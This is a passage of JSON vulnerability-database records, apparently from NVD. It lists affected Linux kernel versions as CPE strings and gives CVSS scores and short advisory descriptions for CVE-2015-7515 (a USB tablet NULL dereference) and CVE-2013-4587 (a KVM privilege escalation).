"cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:22:27", "description": "The aiptek_probe function in drivers/input/tablet/aiptek.c in the Linux kernel before 4.4 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device that lacks endpoints.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "cve", "title": "CVE-2015-7515", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2022-01-18T19:25:00", "cpe": ["cpe:/o:linux:linux_kernel:4.4"], "id": "CVE-2015-7515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7515", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:rc8:*:*:*:*:*:*"]}, {"lastseen": "2023-05-26T14:12:01", "description": "Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.", "cvss3": {}, "published": "2013-12-14T18:08:00", "type": "cve", "title": "CVE-2013-4587", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4587"], "modified": "2023-02-13T04:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.12.5", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.12.4", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.4.7"], "id": "CVE-2013-4587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4587", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", 